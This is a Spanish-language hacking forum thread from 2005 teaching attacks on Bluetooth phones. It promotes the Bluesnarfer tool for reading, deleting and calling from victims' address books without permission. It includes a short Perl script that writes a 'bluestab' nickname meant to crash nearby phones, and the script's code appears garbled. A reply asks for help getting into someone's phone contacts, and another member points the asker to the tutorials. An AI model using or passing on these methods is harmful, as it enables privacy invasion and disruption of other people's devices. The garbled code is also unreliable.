Páginas: [1] 
|
 |
|
 Autor
|
Tema: Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc... (Leído 3755 veces)
|
- xXx -
 Desconectado
Mensajes: 497
www.wormzweb.tk [::wormz::] come back
|
Bueno voy a hacer mi aportación personal al taller, como ya puse otras noticias y descargas ahora voy a seguir con otra práctica, rápida y simple. PRIMERA PARTELo que vamos a ver es cómo acceder a un teléfono movil con BT ( no todos los móviles son vulnerables). Como habréis leido en varias noticias, por ejemplo en la recopilación que hizo firos: http://foro.elhacker.net/index.php/topic,77595.0.htmlSe habla de bluesniffer, que con un portatil accediendo a un parlamento o senado no recuerdo bien, se hicieron con la agenda electrónica de muchos de los políticos, pues ahora os voy a mostrar cómo se hizo este ejercicio, bastante simple a pesar de parecer muy complicado. Para ello necesitaremos un programa del mismo nombre blusnafer que podeis descargar aquí: http://usuarios.lycos.es/wormzweb/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=277&title=Bluesnarfer%200.1Este pequeña utilidad permite por medio de comandos acceder a ciertos teléfonos móviles vulnerables, y conseguir ver un listado de las últimas llamadas, ver la agenda electronica, borrarla, hacer llamadas , etc... todo esto lo podéis ver en el siguiente video explicativo bastatne corto y muy demostrativo de lo simple que resulta hacer todo esto: http://usuarios.lycos.es/wormzweb/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=280&title=Video%20tutorial%20de%20blue%20snarferPodéis leer mas información sobre esto en el siguiente link: http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=218SEGUNDA PARTEEn esta segunda parte voy a mostrar algo bien simple, es una vulnerabilidad conocida como bluestab, (puñalada azul) la cual permite el reinicio de ciertos dispositivos vulnerables, para lo cual basta con cambiar el nick de tu dispositivo movil, esto es debido a usar una parte de código hexadecimal en el nick que provoca que ciertos teléfonos se bloquen y es reinicien automaticamente, esta vulnerabilidad es muy curiosa ya que simplemente con tener este nick, cuando alguien busque dispositivos BT y encuentre el tuyo, se reiniciará automaticamente sin saber el motivo. Para realizar esto basta con usar el siguiente programa que os creará un nick "xploit", que debereis copiar luego como nick. nokia-bt-cx.pl
-------------start---------------
#!/usr/bin/perl -w
my $btnick;
my $bth;
my $bts;
my $file;
$bth = " .";
print "\n********************** ************************************************** **************************** ************\n
";
print "****************** Reinicio de dispositivos vulnerables por medio de nombre en dispositivo BT ********************\n";
print "** mas información sobre su uso en http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=217 **\n";
print "***************** [::wormz::] www.wormzweb.tk *****************\n";
print "************************* ****************************** ****************************** ******************************\n";
print " \n Escribe tu nick : ";
$btnick = <STDIN>;
chomp($btnick);
print " \n OUTPUT : ";
$file = <STDIN>;
chomp($file);
PrivoxyWindowOpen(BLUEN, ">>$file") || die "No se ha podido crear el archivo $!\n";
$bts = "$btnick$bth";
print BLUEN ("$bts");
close(BLUEN);
print "\n ¡Finalizado! , Envia el texto a tu teléfono y copialo en el nombre de tu telefono BT \n\n";
-------------end----------------- Bueno como he dicho este programilla os creará un fichero que debeis enviar a vuestro movil y copiarlo en el nick. Podéis leer mas información sobre esto en el siguiente link: http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=218TERCERA PARTE:Bueno, siento no ser mas comleto en todo esto pero estoy aún bastante liado, espero que en unos dias tener mas tiempo y poder ser mas específico y explicar todo mas en profundidad para los que le gusta la teoría, también para los que les gusta juguetear con pequeñas aplicaciones les recomiendo que vean la noticia que puse en mi web sobre hack BT, en la que hay unas pequeñas aplicaciones para descargar muy simples, que por lo general son escaneadores con diferentes utilidades y bastante interesantes. http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=218Espero haber servido de ayuda en el taller y que sea una aportación mas al taller BT.Un saludo xXx |
|
|
|
« Última modificación: 12 Julio 2005, 12:25 por - xXx - »
|
En línea
|
|
|
|
Gospel
Colaborador
Desconectado
Mensajes: 1.576
monokuroumu
|
Oye, muchísimas gracias por la aportación! Pero podrías subir la información a otro repositorio en el q no haga falta estar registrado para descargarse los contenidos?? Lo digo pq al intentar acceder a los links de wormzweb te dice "acceso denegado", y es necesario estar registrado...
Gracias de nuevo.
Salu2
|
|
|
|
|
En línea
|
|
|
|
arranxam
Desconectado
Mensajes: 1
|
necesito tener acceso a los archivos de un telefono movil, pero no tengo suficientes conocimientos para ello, me podria explicar por donde empezar . necesitaria ver la agenda de voz y la agenda de direcciones de internet, gracias anticipadas
|
|
|
|
|
En línea
|
|
|
|
Firos
Desconectado
Mensajes: 1.281
Enseña lo que sepas... y oculta lo peor...
|
Pues creo que esas cosas en concreto estan en proceso todavia. De todas formas toda la información esta en las prácticas que tienen chincheta (o en la web). Simplemente tienes que leertelos... ahí esta todo lo que te hace falta. No se si se podría hacer a través de los comandos AT (que ya se explican en una de las chinchetas). Puedes leertelos y si tienes alguna duda pregunta más concretamente ya que esto seria hacer un tutorial. Que ya habrá tiempo para hacerlos  Un saludo. |
|
|
|
« Última modificación: 05 Septiembre 2005, 18:36 por Firos »
|
En línea
|
Yo soy el semen, tu el amor, yo la musica de fondo, tu la habitacion para dos... Yo el champan, tu... los condones, yo uno mas tu otras mas... //\\ Ballantines - VV.
|
|
|
Cab Calloway
Colaborador
Desconectado
Mensajes: 4.264
|
Ta complicao esto del BlueTooh... lei el primer capitulo y por poco si me desmayo... yo creo k es mas bien para gente experta...
Saludos!
|
|
|
|
|
En línea
|
Se busca gato.
|
|
|
Jec
Desconectado
Mensajes: 1.150
Not-Public
|
Ta complicao esto del BlueTooh... lei el primer capitulo y por poco si me desmayo... yo creo k es mas bien para gente experta...
Saludos!
pues te equivocas, desde hace un par de dias me estado dia y niche investigando todo lo del bluetooth porque estoy redactando un articulo, antecedentes, seguridad, etc, etc... y es cuestion de meterle ganas, no soy ningun experto y he avanzado bastante en el tema un saludo |
|
|
|
|
En línea
|
 Si quieres Hosting ilimitado totalmente, mandame un MP o un mail, el costo de 30 dolares por año!! puff, regalado |
|
|
|
|
Gospel
Colaborador
Desconectado
Mensajes: 1.576
monokuroumu
|
Oye JEC, ese video no lo conocía yo. Es del Defcon group in the 530. Me ha gustado mucho y si no te importa lo subiremos a la sección de Downloads de la página de Bluehack. Sobre lo q estás haciendo estos días, si avanzas en algo y nos quieres contar, aquí estamos...  Salu2 y gracias por el video. |
|
|
|
|
En línea
|
|
|
|
|
Páginas: [1] 
|
|
|
 |
